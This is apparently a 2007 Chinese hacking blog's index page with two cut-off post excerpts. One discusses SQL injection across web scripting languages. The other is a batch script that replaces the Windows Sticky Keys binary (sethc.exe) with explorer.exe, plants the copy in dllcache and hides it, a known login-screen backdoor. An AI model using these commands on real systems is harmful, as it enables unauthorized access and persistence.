2007年9月3日
摘要: 很多人都说什么ASP PHP JSP注射 其实注射最直接是跟数据库有关!然而那些脚本只是一种辅助 例如ASP/ASPX JSP 啥限制都没!而PHP则会把' 过滤为\' 但是若然不是MYSQL POSTGRESQL SQLITE的话这个功能就废了! 但是我觉得这些脚本语言都不狠~如果CFM的话 估计你就没折了! 具体各数据库相关信息请参看 ART OF WEB-SQL-INJECTION第1卷 感... 阅读全文
posted @ 2007-09-03 15:57 %5C 阅读(369) 评论(0) 推荐(0) 编辑
摘要: @echo off cls copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32 \dllcache\sethc.exe attrib c:\windows\system32\sethc.exe +h attrib c:\wi... 阅读全文
posted @ 2007-09-03 12:10 %5C 阅读(628) 评论(2) 推荐(0) 编辑